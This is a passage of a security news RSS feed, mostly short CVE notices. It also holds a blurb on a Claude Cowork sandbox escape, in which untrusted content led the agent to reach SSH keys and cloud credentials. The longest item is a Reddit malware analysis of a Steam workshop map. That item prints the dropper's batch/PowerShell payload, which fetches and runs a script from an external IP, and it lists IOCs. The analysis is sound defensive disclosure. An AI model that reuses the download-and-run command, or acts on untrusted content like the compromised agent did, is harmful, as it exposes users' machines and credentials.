<guid isPermaLink="true">https://tsecurity.de/de/3690930/sicherheitsluecken/cve-2026-12877-project-management-bug-and-issue-tracking-plugin-up-to-50x-on-wordpress-issue-tracker-configuration-improper-authentication/</guid>
<pubDate>Fri, 24 Jul 2026 09:40:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/project_management_bug_and_issue_tracking_plugin">Project Management, Bug and Issue Tracking Plugin up to 5.0.x</a> on WordPress. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown function of the component <em>Issue-Tracker Configuration</em>. Performing a manipulation results in improper authentication.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-12877">CVE-2026-12877</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[Jibo’s Spiritual Successor Is Here: Lingverse Unveils AI Wearable iKairos]]></title>
<description><![CDATA[If you remember Jibo, you’ll probably also remember its emotional farewell. The social robot, once named...
The post Jibo’s Spiritual Successor Is Here: Lingverse Unveils AI Wearable iKairos appeared first on Fossbytes.]]></description>
<link>https://tsecurity.de/de/3690906/linux-tipps/jibos-spiritual-successor-is-here-lingverse-unveils-ai-wearable-ikairos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690906/linux-tipps/jibos-spiritual-successor-is-here-lingverse-unveils-ai-wearable-ikairos/</guid>
<pubDate>Fri, 24 Jul 2026 09:19:56 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you remember Jibo, you’ll probably also remember its emotional farewell. The social robot, once named...</p>
<p>The post <a rel="nofollow" href="https://fossbytes.com/jibos-spiritual-successor-is-here-lingverse-unveils-ai-wearable-ikairos/">Jibo’s Spiritual Successor Is Here: Lingverse Unveils AI Wearable iKairos</a> appeared first on <a rel="nofollow" href="https://fossbytes.com/">Fossbytes</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Cowork Sandbox Escape Flaw Lets Attackers Access SSH Keys and Cloud Credentials]]></title>
<description><![CDATA[A newly revealed sandbox escape vulnerability affecting Anthropic’s Claude Cowork could allow untrusted content processed by the AI agent to access sensitive files on a macOS host. This includes SSH private keys, cloud credentials, and other data that are available to the logged-in user. Security...]]></description>
<link>https://tsecurity.de/de/3690856/it-security-nachrichten/claude-cowork-sandbox-escape-flaw-lets-attackers-access-ssh-keys-and-cloud-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690856/it-security-nachrichten/claude-cowork-sandbox-escape-flaw-lets-attackers-access-ssh-keys-and-cloud-credentials/</guid>
<pubDate>Fri, 24 Jul 2026 08:58:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly revealed sandbox escape vulnerability affecting Anthropic’s Claude Cowork could allow untrusted content processed by the AI agent to access sensitive files on a macOS host. This includes SSH private keys, cloud credentials, and other data that are available to the logged-in user. Security researcher Oren Yomtov from Accomplish has named this attack path […]</p>
<p>The post <a href="https://gbhackers.com/claude-cowork-sandbox-escape-flaw/">Claude Cowork Sandbox Escape Flaw Lets Attackers Access SSH Keys and Cloud Credentials</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-4874 | Mutt up to 2.2.11 Email null pointer dereference (EUVD-2023-54713 / Nessus ID 235543)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in Mutt up to 2.2.11. This impacts an unknown function of the component Email Handler. The manipulation results in null pointer dereference.

This vulnerability was named CVE-2023-4874. The attack may be performed from remote. There is no availa...]]></description>
<link>https://tsecurity.de/de/3690822/sicherheitsluecken/cve-2023-4874-mutt-up-to-2211-email-null-pointer-dereference-euvd-2023-54713-nessus-id-235543/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690822/sicherheitsluecken/cve-2023-4874-mutt-up-to-2211-email-null-pointer-dereference-euvd-2023-54713-nessus-id-235543/</guid>
<pubDate>Fri, 24 Jul 2026 08:28:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/mutt">Mutt up to 2.2.11</a>. This impacts an unknown function of the component <em>Email Handler</em>. The manipulation results in null pointer dereference.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2023-4874">CVE-2023-4874</a>. The attack may be performed from remote. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Weaponize Notepad++ 8.8.3 to Silently Install MATCHBOIL.V2 Malware]]></title>
<description><![CDATA[CERT-UA has disclosed a significant shift in the tactics of threat cluster UAC-0099, revealing a novel infection chain that abuses a legitimate Notepad++ 8.8.3 executable to sideload malware, alongside an upgraded MATCHBOIL.V2 loader and two new tools named LUNCHPOKE and BURNYBEAR. The campaign, ...]]></description>
<link>https://tsecurity.de/de/3690764/it-security-nachrichten/hackers-weaponize-notepad-883-to-silently-install-matchboilv2-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690764/it-security-nachrichten/hackers-weaponize-notepad-883-to-silently-install-matchboilv2-malware/</guid>
<pubDate>Fri, 24 Jul 2026 07:41:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CERT-UA has disclosed a significant shift in the tactics of threat cluster UAC-0099, revealing a novel infection chain that abuses a legitimate Notepad++ 8.8.3 executable to sideload malware, alongside an upgraded MATCHBOIL.V2 loader and two new tools named LUNCHPOKE and BURNYBEAR. The campaign, documented since mid-summer 2026, marks a notable evolution from the group’s earlier […]</p>
<p>The post <a href="https://cyberpress.org/hackers-weaponize-notepad-8-8-3/">Hackers Weaponize Notepad++ 8.8.3 to Silently Install MATCHBOIL.V2 Malware</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50651 | Microsoft .NET allocation of resources (Nessus ID 329187)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Microsoft .NET. This vulnerability affects unknown code. Performing a manipulation results in allocation of resources.

This vulnerability was named CVE-2026-50651. The attack may be initiated remotely. There is no available exploit.

App...]]></description>
<link>https://tsecurity.de/de/3690589/sicherheitsluecken/cve-2026-50651-microsoft-net-allocation-of-resources-nessus-id-329187/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690589/sicherheitsluecken/cve-2026-50651-microsoft-net-allocation-of-resources-nessus-id-329187/</guid>
<pubDate>Fri, 24 Jul 2026 04:54:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/microsoft:">Microsoft .NET</a>. This vulnerability affects unknown code. Performing a manipulation results in allocation of resources.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-50651">CVE-2026-50651</a>. The attack may be initiated remotely. There is no available exploit.

Applying a patch is the recommended action to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60773 | Oracle Application Object Library up to 12.2.15 Core improper authorization (Nessus ID 329251)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Oracle Application Object Library up to 12.2.15. This affects an unknown part of the component Core. The manipulation results in improper authorization.

This vulnerability was named CVE-2026-60773. The attack may be performed from r...]]></description>
<link>https://tsecurity.de/de/3690547/sicherheitsluecken/cve-2026-60773-oracle-application-object-library-up-to-12215-core-improper-authorization-nessus-id-329251/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690547/sicherheitsluecken/cve-2026-60773-oracle-application-object-library-up-to-12215-core-improper-authorization-nessus-id-329251/</guid>
<pubDate>Fri, 24 Jul 2026 03:47:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/oracle:application_object_library">Oracle Application Object Library up to 12.2.15</a>. This affects an unknown part of the component <em>Core</em>. The manipulation results in improper authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-60773">CVE-2026-60773</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2020-19909 | cURL 7.65.2 Retry Delay tool_operate.c integer overflow]]></title>
<description><![CDATA[A vulnerability was found in cURL 7.65.2 and classified as problematic. Affected by this issue is some unknown functionality of the file tool_operate.c of the component Retry Delay Handler. Executing a manipulation can lead to integer overflow.

This vulnerability is handled as CVE-2020-19909. Th...]]></description>
<link>https://tsecurity.de/de/3690448/sicherheitsluecken/cve-2020-19909-curl-7652-retry-delay-tooloperatec-integer-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690448/sicherheitsluecken/cve-2020-19909-curl-7652-retry-delay-tooloperatec-integer-overflow/</guid>
<pubDate>Fri, 24 Jul 2026 01:44:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/curl">cURL 7.65.2</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is some unknown functionality of the file <em>tool_operate.c</em> of the component <em>Retry Delay Handler</em>. Executing a manipulation can lead to integer overflow.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2020-19909">CVE-2020-19909</a>. The attack can only be done within the local network. There is not any exploit available.

There are still doubts about whether this vulnerability truly exists.

It is best practice to apply a patch to resolve this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60400 | Oracle GoldenGate up to 19.30.0.0/21.21/23.26.1 Admin Server Executable privileges management (Nessus ID 329213)]]></title>
<description><![CDATA[A vulnerability labeled as very critical has been found in Oracle GoldenGate up to 19.30.0.0/21.21/23.26.1. Affected is an unknown function of the component Admin Server Executable. The manipulation results in improper privilege management.

This vulnerability was named CVE-2026-60400. The attack...]]></description>
<link>https://tsecurity.de/de/3690421/sicherheitsluecken/cve-2026-60400-oracle-goldengate-up-to-193000212123261-admin-server-executable-privileges-management-nessus-id-329213/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690421/sicherheitsluecken/cve-2026-60400-oracle-goldengate-up-to-193000212123261-admin-server-executable-privileges-management-nessus-id-329213/</guid>
<pubDate>Fri, 24 Jul 2026 01:07:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">very critical</a> has been found in <a href="https://vuldb.com/product/oracle:goldengate">Oracle GoldenGate up to 19.30.0.0/21.21/23.26.1</a>. Affected is an unknown function of the component <em>Admin Server Executable</em>. The manipulation results in improper privilege management.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-60400">CVE-2026-60400</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50032 | MZ Automation libIEC61850 up to 1.6.1 MMS Write Named Variable List null pointer dereference (EUVD-2026-48397)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in MZ Automation libIEC61850 up to 1.6.1. This issue affects some unknown processing of the component MMS Write Named Variable List Handler. Performing a manipulation results in null pointer dereference.

This vulnerability is known as CVE-...]]></description>
<link>https://tsecurity.de/de/3690391/sicherheitsluecken/cve-2026-50032-mz-automation-libiec61850-up-to-161-mms-write-named-variable-list-null-pointer-dereference-euvd-2026-48397/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690391/sicherheitsluecken/cve-2026-50032-mz-automation-libiec61850-up-to-161-mms-write-named-variable-list-null-pointer-dereference-euvd-2026-48397/</guid>
<pubDate>Fri, 24 Jul 2026 00:44:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/mz_automation:libiec61850">MZ Automation libIEC61850 up to 1.6.1</a>. This issue affects some unknown processing of the component <em>MMS Write Named Variable List Handler</em>. Performing a manipulation results in null pointer dereference.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-50032">CVE-2026-50032</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Workshop map for MECCHA CHAMELEON is a malware dropper (full breakdown)]]></title>
<description><![CDATA[Table of Contents  Intro Initial Symptom First Look at the Workshop Files Verifying the Asset Files AssetRegistry.bin Reveals the First Clue Opening the UE5 Asset Container Reverse Engineering the Blueprint Extracting the Embedded Payload Analyzing the Dropper Script Confirming Execution on an Af...]]></description>
<link>https://tsecurity.de/de/3690349/malware-trojaner-viren/workshop-map-for-meccha-chameleon-is-a-malware-dropper-full-breakdown/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690349/malware-trojaner-viren/workshop-map-for-meccha-chameleon-is-a-malware-dropper-full-breakdown/</guid>
<pubDate>Fri, 24 Jul 2026 00:21:11 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><h1>Table of Contents</h1> <ul> <li>Intro</li> <li>Initial Symptom</li> <li>First Look at the Workshop Files</li> <li>Verifying the Asset Files</li> <li>AssetRegistry.bin Reveals the First Clue</li> <li>Opening the UE5 Asset Container</li> <li>Reverse Engineering the Blueprint</li> <li>Extracting the Embedded Payload</li> <li>Analyzing the Dropper Script</li> <li>Confirming Execution on an Affected PC</li> <li>Did the Second Stage Execute?</li> <li>Analysis Summary</li> <li>Limitations &amp; Unknowns</li> <li>IOCs</li> <li>Final verdict</li> </ul> <p>A couple of my friends reported seeing a command prompt window briefly appear while Steam was downloading a custom workshop map. The map was being downloaded through the game's in-game lobby and, once the download completed it immediately began loading for the match. Since the command prompt window appeared during this transition, I decided to investigate the workshop files.</p> <p>What I found was a seemingly ordinary workshop map that contained what appears to be a malware dropper, despite having passed workshop review.</p> <p>I'm writing this up because, as far as I know, the map is still available, and because the techniques it uses to hide are worth understanding if you download workshop content. While there are still a few parts of the execution chain I can't fully explain, the artifacts themselves are interesting from a reverse engineering perspective.</p> <p><a href="https://preview.redd.it/nn7j9wf4q1fh1.png?width=1265&amp;format=png&amp;auto=webp&amp;s=0276954f24bafc16cee6b2fc2569c12bedeaea51">https://preview.redd.it/nn7j9wf4q1fh1.png?width=1265&amp;format=png&amp;auto=webp&amp;s=0276954f24bafc16cee6b2fc2569c12bedeaea51</a></p> <p><strong>1): The Initial Symptom</strong></p> <p>A black command prompt window flashed on screen for about a second before disappearing. It appeared while Steam was still downloading the workshop map, just as the game was transitioning into loading it for the match. There were no crashes, error messages, or any other unusual behavior. On its own, it would have been easy to dismiss as Steam running a background process, but seeing a console window appear during a workshop download / match launch was unusual enough that I decided to investigate.</p> <p><strong>2): First Look at the Workshop Files</strong></p> <p>The workshop content is located here:</p> <pre><code>Steam\steamapps\workshop\content\4704690\3765145606\ </code></pre> <p>At first glance, there’s nothing suspicious in the folder. The contents are:</p> <pre><code>AssetRegistry.bin Preview.png Sample.vdf SampleMyUGCMecchaCModKit_Load-Windows.pak SampleMyUGCMecchaCModKit_Load-Windows.ucas SampleMyUGCMecchaCModKit_Load-Windows.utoc </code></pre> <p>There are no executables, DLLs, batch files, or scripts. The <code>.pak</code>, <code>.ucas</code>, and <code>.utoc</code> files are simply the standard Unreal Engine 5 asset container format used for packaging game content exactly what you would expect to see from a UE5 map or mod.</p> <p>This is worth emphasizing: if you were manually checking this folder for malware, there would be no obvious red flags here. Nothing in this directory suggests anything malicious. That is likely why it passed review in the first place.</p> <p><strong>3): Verifying the Asset Files</strong></p> <p>File extensions are easy to spoof, so I checked the actual file headers and scanned the contents for embedded executable data.</p> <p>The results:</p> <ul> <li>utoc starts with <code>-==--==--==--==-</code>, which is the real IoStore magic</li> <li>pak has the correct <code>0x5A6F12E1</code> footer magic</li> <li>no MZ/PE, ELF or ZIP headers anywhere in any file</li> </ul> <p>The files appear to be valid Unreal Engine asset containers, not disguised executables. There is no standalone executable payload present in this mod. If there is unexpected behavior, it would have to be occurring through the game’s normal asset-loading pipeline rather than from an included executable file.</p> <p><strong>4): AssetRegistry.bin Reveals the First Clue</strong></p> <p>This is the detail that stands out most from the entire investigation.</p> <p>AssetRegistry.bin is largely readable metadata. You can open it in a text editor and see references to the actors placed throughout the maps. Normally, it contains exactly the kind of information you would expect: StaticMeshActor, PointLight, PlayerStart, and other standard Unreal Engine objects.</p> <p>However, one Blueprint actor immediately stands out:</p> <pre><code>/Game/Mods/NewMap.NewMap:PersistentLevel.BP_RCE_Test_C_0 </code></pre> <p>Its class resolves as:</p> <pre><code>BP_AmbientController_C </code></pre> <p>Those two names together are unusual. The class name suggests a harmless environmental or lighting-related system especially since it appears under folders such as Environment and Lighting. However, the placed actor still retains the older name BP_RCE_Test_C_0.</p> <p>In Unreal Engine, this can happen because placed actors keep the name they were created with even if the Blueprint class is later renamed. Renaming the class does not automatically rename every existing instance placed in maps.</p> <p>That means the BP_RCE_Test name likely existed at an earlier point in the asset’s history. Whether intentional or not, the old identifier remains embedded in the map metadata.</p> <p>The same reference appears across three separate maps included in the workshop item, including a NewMap_Backup file that appears to have been left in the upload.</p> <p><strong>5): Opening the UE5 Asset Container</strong></p> <p>The Blueprint data is stored inside the Oodle-compressed .ucas container. Reading the accompanying .utoc metadata reveals:</p> <pre><code>chunks ............ 57 blocks ............ 131 (130 Oodle-compressed) flags ............. Compressed | Indexed </code></pre> <p>No encryption flag is present, meaning the container can be inspected using available Unreal Engine asset tooling and compatible Oodle/Kraken decompression support. All 131 blocks decompress successfully, producing roughly 5.3 MB of extracted data.</p> <p>The container contains 55 assets in total: materials, meshes, textures, four maps, and three Blueprints. Two of those Blueprints appear to be untouched sample assets from the official ModKit, containing no custom logic.</p> <p>Searching across the extracted asset data revealed only a small number of notable references:</p> <pre><code>ReceiveBeginPlay ....... 1 ToFile ................. 1 GetPlatformUserDir ..... 1 powershell ............. 1 </code></pre> <p>These references are concentrated in a single Blueprint rather than being distributed throughout the package. There does not appear to be additional hidden logic elsewhere in the container, which makes the relevant behavior easier to isolate and analyze.</p> <p><strong>6): Reverse Engineering the Blueprint</strong></p> <p>The complete function chain is:</p> <pre><code>ReceiveBeginPlay ↓ GetPlatformUserDir ↓ Replace ↓ Concat_StrStr ↓ FromString (JSON) ↓ ToFile </code></pre> <p>Despite the Blueprint being named like an environment or lighting system, the logic does not appear to perform any lighting, ambience, or world-management functions. Instead, it constructs a file path and writes data to disk.</p> <p>Tracing the Blueprint bytecode shows the path construction:</p> <pre><code>dir = GetPlatformUserDir() // C:/Users/&lt;user&gt;/Documents/ path = dir + "s.bat" </code></pre> <p>ReceiveBeginPlay is normally called when the map begins loading, which does not fully match the behavior reported by some users, who observed activity during the download process itself. That discrepancy is not explained by the Blueprint logic alone, so it is worth treating those reports separately from the behavior confirmed through asset analysis.</p> <p><strong>7): Extracting the Embedded Payload</strong></p> <p>A single embedded string inside the Blueprint contains the following data:</p> <pre><code>{"x\"&amp;if not defined _Z (set _Z=1&amp;start /min cmd /c %~f0&amp;exit) else ( powershell -w hidden -ep bypass -c iwr http://31.57.34.228/work/steamb.bat -OutFile $env:TEMP\s.bat; cmd /c $env:TEMP\s.bat&amp;exit)&amp;\"x":"1"} </code></pre> <p>The string is structured as a JSON/batch polyglot: it is valid JSON while also containing batch command syntax inside the JSON key. The command content is therefore preserved when written as JSON data, but can also be interpreted as a batch script if the resulting file is executed.</p> <p>This format is significant because the earlier Blueprint analysis showed that the file-writing step uses <code>ToFile</code>, which writes JSON data. The embedded content appears designed to satisfy that JSON requirement while retaining executable command syntax.</p> <p>The combination of a JSON-compatible wrapper and embedded command execution logic is not typical of normal Unreal Engine asset data and is a strong indicator that the content was deliberately constructed rather than being accidental or generated by the engine.</p> <p><strong>8): Analyzing the Dropper Script</strong></p> <p>The extracted script is also human-readable:</p> <pre><code>if not defined _Z ( set _Z=1 start /min cmd /c %~f0 exit ) else ( powershell -w hidden -ep bypass -c ^ iwr http://31.57.34.228/work/steamb.bat -OutFile $env:TEMP\s.bat cmd /c $env:TEMP\s.bat exit ) </code></pre> <p>The script uses a simple two-stage execution flow.</p> <p>On the first run, <code>_Z</code> is not defined, so the script sets the variable, launches a minimized copy of itself, and exits. This relaunch behavior explains the brief command window flash reported by some users. At this stage, the script is acting as a launcher rather than performing the main action.</p> <p>On the second run, the <code>_Z</code> variable is already present, so the script follows the alternate branch. It starts PowerShell with a hidden window, modifies the execution policy for that process, downloads <code>steamb.bat</code> from a hardcoded external address, saves it to the temporary directory, and executes it.</p> <p>The <code>_Z</code> check appears to exist solely to prevent the script from repeatedly relaunching itself.</p> <p>The script itself is relatively simple: there is no evidence here of persistence mechanisms, privilege escalation, or sophisticated obfuscation. Its main purpose appears to be retrieving and executing a second-stage script. That second stage is hosted externally, meaning its contents can change independently of the original mod package.</p> <p><strong>9): Confirming Execution on an Affected PC</strong></p> <p>On one affected system, I found a file that was byte-for-byte identical to the payload string embedded in the Blueprint. It was located at the exact path identified during the bytecode analysis.</p> <p>This confirms that the Blueprint logic was not just theoretical, the file-writing behavior observed during reverse engineering occurred on a real system.</p> <p><a href="https://preview.redd.it/hav7l33dq1fh1.png?width=2252&amp;format=png&amp;auto=webp&amp;s=9fc74ff8ac7e3607889cb9a4f052d8d73e0f2f32">https://preview.redd.it/hav7l33dq1fh1.png?width=2252&amp;format=png&amp;auto=webp&amp;s=9fc74ff8ac7e3607889cb9a4f052d8d73e0f2f32</a></p> <p><strong>10): Did the second stage execute?</strong></p> <p>The second-stage file, <code>%TEMP%\s.bat</code>, was not present on the affected machine. The PowerShell Operational log explains why:</p> <p><a href="https://preview.redd.it/srmpq28pq1fh1.png?width=1577&amp;format=png&amp;auto=webp&amp;s=6a2841345f423906fafaa570acd20d85636e3b70">https://preview.redd.it/srmpq28pq1fh1.png?width=1577&amp;format=png&amp;auto=webp&amp;s=6a2841345f423906fafaa570acd20d85636e3b70</a></p> <p>The download request failed with an HTTP 404 response at the time of execution. Because the file was never successfully retrieved, nothing was written to disk and the following <code>cmd /c</code> command had no script to execute.</p> <p>On this system, the second stage did not execute. The contents and behavior of the downloaded payload remain unknown because the external file was unavailable at the time of analysis.</p> <p>The address embedded in the script resolves to <code>31.57.34.228</code>. At the time of analysis, the IP address was geolocated to Amsterdam, Netherlands, and was associated with Blockchain Creek B.V. (ASN 207994).</p> <p>This information identifies the hosting infrastructure used by the download URL, but it does not by itself identify the operator of the server or establish attribution. The important finding is that the Blueprint attempted to retrieve an additional payload from an external location, rather than containing the final payload entirely within the workshop files.</p> <p><a href="https://preview.redd.it/y1b4bj6sq1fh1.png?width=2546&amp;format=png&amp;auto=webp&amp;s=141474bd203a7d6529591ae09487da2e35e58026">https://preview.redd.it/y1b4bj6sq1fh1.png?width=2546&amp;format=png&amp;auto=webp&amp;s=141474bd203a7d6529591ae09487da2e35e58026</a></p> <p><strong>11): Analysis Summary</strong></p> <p>Based on the evidence recovered from the workshop item, this should be treated as malicious content. That conclusion does not rely on a single indicator; it comes from the combination of several independent findings:</p> <ul> <li>The Workshop uploader account appears to have been created only about one week before the item was published</li> <li>The Workshop map currently does not allow users to leave comments or ratings</li> <li>The only Blueprint containing custom logic was originally identified as <code>BP_RCE_Test</code> and later appeared under a name consistent with a harmless environment or lighting controller.</li> <li>The Blueprint executes automatically through <code>ReceiveBeginPlay</code>, rather than requiring an intentional user action inside the map.</li> <li>Its logic writes data outside the game directory into the user’s Documents folder, which is unrelated to normal map or asset behavior.</li> <li>The written content is a deliberately structured JSON/batch polyglot, allowing data written through a JSON-only function to retain executable batch syntax.</li> <li>That script launches hidden PowerShell, bypasses the local execution policy for the process, retrieves a second-stage file from a hardcoded external address, and attempts to execute it.</li> </ul> <p>What remains unknown is the purpose of the final payload. The second-stage script was not successfully retrieved during analysis and was no longer available from the remote location, so its behavior cannot be determined. Claims that it was specifically an infostealer, loader, or another type of malware would be speculation without that payload.</p> <p><strong>12): Limitations &amp; Unknowns</strong></p> <p><strong>What does</strong> <code>steamb.bat</code> <strong>do?</strong></p> <p>Unknown. The second-stage payload was not delivered during analysis, so its final behavior cannot be determined from the available evidence.</p> <h1>IOCs</h1> <pre><code>Workshop item 3765145606 "Laser Tag Neon" (appid 4704690) comments and ratings disabled on the listing uploader account roughly one week old Asset BP_AmbientController.uasset (originally BP_RCE_Test_C_0) Dropped file %USERPROFILE%\Documents\s.bat C2 http://31.57.34.228/work/steamb.bat Second stage steamb.bat (never delivered, contents unknown) Asset build 2026-06-09 22:37:14 s.bat 210 bytes sha256 1ff540bc3c493a93059e602b414ba61027ed1a2b8a079f6197b0718f4a2101b6 md5 04d6dfadd5248c995951707e27520ade container utoc aea429fbb44d552c917c22018e838e4154e68a8cac5806f7a8e30b61586ba2a6 ucas fbd932faba4ec8d614fbd7a68636e177213259bafe2babdcdc47c2a8acd6d569 pak aa58f9061a4e39e3f5a28395c56cfa5b0072d90e66054894f9c8022e81e396c9 </code></pre> <p><strong>Final Verdict</strong></p> <p>Based on everything I found, I believe this workshop item is very likely malicious, but there are still parts of the execution chain I couldn't directly observe.</p> <p>What I can say with confidence is that the asset contains a Blueprint whose only meaningful purpose is to write a batch file outside the game's directory into the user's Documents folder. That batch file then attempts to launch PowerShell with the execution policy bypassed, download a second batch file from a hard-coded external server, and execute it.</p> <p>I can't think of a legitimate reason for a Steam workshop map to write a .bat file into a user's Documents folder and then use PowerShell to fetch and run another <code>.bat</code> file from the Internet. Even without knowing what the second stage contained, that behavior is extremely difficult to explain as anything other than a malware delivery chain.</p> <p>Could there be some edge case I'm missing? Absolutely. That's why I've tried to separate facts from assumptions throughout this write-up. But given the evidence recovered from the assets themselves, I think calling this a malicious dropper is the conclusion best supported by the data</p> <p>Further independent investigation is encouraged, particularly if additional evidence becomes available. For now, the workshop item and the uploader have been reported and flagged for review.</p> <p>Cheers and stay safe!</p> <p>FeintBe</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/feintbe"> /u/feintbe </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4sged/workshop_map_for_meccha_chameleon_is_a_malware/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4sged/workshop_map_for_meccha_chameleon_is_a_malware/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2000-0963 | ncurses up to 5.1.2 TERM/TERMINFO_DIRS memory corruption (XFDB-44487 / SBV-20698)]]></title>
<description><![CDATA[A vulnerability has been found in ncurses up to 5.1.2 and classified as problematic. This vulnerability affects unknown code. Performing a manipulation of the argument TERM/TERMINFO_DIRS as part of Environment Variable results in memory corruption.

This vulnerability was named CVE-2000-0963. The...]]></description>
<link>https://tsecurity.de/de/3690315/sicherheitsluecken/cve-2000-0963-ncurses-up-to-512-termterminfodirs-memory-corruption-xfdb-44487-sbv-20698/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690315/sicherheitsluecken/cve-2000-0963-ncurses-up-to-512-termterminfodirs-memory-corruption-xfdb-44487-sbv-20698/</guid>
<pubDate>Fri, 24 Jul 2026 00:11:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/ncurses">ncurses up to 5.1.2</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This vulnerability affects unknown code. Performing a manipulation of the argument <em>TERM/TERMINFO_DIRS</em> as part of <em>Environment Variable</em> results in memory corruption.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2000-0963">CVE-2000-0963</a>. The attack needs to be approached locally. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60157 | Oracle GoldenGate up to 19.29.0.0/21.21/23.26.1.0.0 Service Manager privileges management (Nessus ID 329213)]]></title>
<description><![CDATA[A vulnerability categorized as very critical has been discovered in Oracle GoldenGate up to 19.29.0.0/21.21/23.26.1.0.0. Affected by this issue is some unknown functionality of the component Service Manager. The manipulation results in improper privilege management.

This vulnerability was named ...]]></description>
<link>https://tsecurity.de/de/3690238/sicherheitsluecken/cve-2026-60157-oracle-goldengate-up-to-19290021212326100-service-manager-privileges-management-nessus-id-329213/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690238/sicherheitsluecken/cve-2026-60157-oracle-goldengate-up-to-19290021212326100-service-manager-privileges-management-nessus-id-329213/</guid>
<pubDate>Thu, 23 Jul 2026 23:08:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">very critical</a> has been discovered in <a href="https://vuldb.com/product/oracle:goldengate">Oracle GoldenGate up to 19.29.0.0/21.21/23.26.1.0.0</a>. Affected by this issue is some unknown functionality of the component <em>Service Manager</em>. The manipulation results in improper privilege management.

